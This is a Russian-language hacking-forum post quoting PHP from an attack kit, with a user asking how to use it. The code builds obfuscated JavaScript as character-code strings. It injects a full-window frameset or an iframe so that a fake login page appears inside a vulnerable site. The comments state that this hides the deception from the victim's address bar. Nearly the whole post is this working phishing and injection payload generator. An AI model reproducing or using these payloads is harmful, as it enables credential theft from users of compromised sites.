|
Участник форума
Регистрация: 03.06.2008
Сообщений: 174
Провел на форуме:
2902191
Репутация:
45
|
|
в шкатулке была такая фишка
// А вот сладкая инновация - вставка фрейма в натуральную величину окна,
// что позволило не редиректить жертву на левый хост, а рисовать лживый
// вход прямо в окне браузера, не паля адресную строку
Код:
case 'redirect':
*for($x=0; $x !== strlen($redirect_to); $x++) // Шифруем код для редиректа на фейк
*{
* if($x+1 == strlen($redirect_to)) $kopilka .= ord($redirect_to[$x]);
* else $kopilka .= ord($redirect_to[$x]).',';
*}
$kopilka = '100,111,99,117,109,101,110,11'.'6'.',46,119,114,1'.'0'.'5,116,101,40,39,60,102,114,97,109,101,115,101,116,32,99,111,108,115,'.
'61,49,48,48,37,3'.'2'.',114,111,11'.'9'.',115,61,4'.'9'.',48,48,37,32,98,111,114,100,101,114,'.'6'.'1,48,32,102,114,97,109'.
',101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,6'.
'0,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,115,114,99,61,34,'.
$kopilka.',34,62,60,47,102,114,97,109,101,115,101,116,62,39,41'; *break;
// Второе новшество - вставка ифрейма
case 'iframe':
*for($x=0; $x !== strlen($iframe_addr); $x++) // Шифруем код для редиректа на фейк
*{
* if($x+1 == strlen($iframe_addr)) $kopilka .= ord($iframe_addr[$x]);
* else $kopilka .= ord($iframe_addr[$x]).',';
*}
$kopilka = '120,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,10'.
'5,102,114,97,109,101,39,41,59,120,46,115,114,99,61,34,'.$kopilka.',34,59,100,111,99,117,109,101,110,116,46,9'.
'8,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,120,41,59'; *break;
default: die('<font face=verdana color=red size=3><b>Выбрана неизвестная начинка для уязвимости!</b></font>');
}
как это можно использовать? |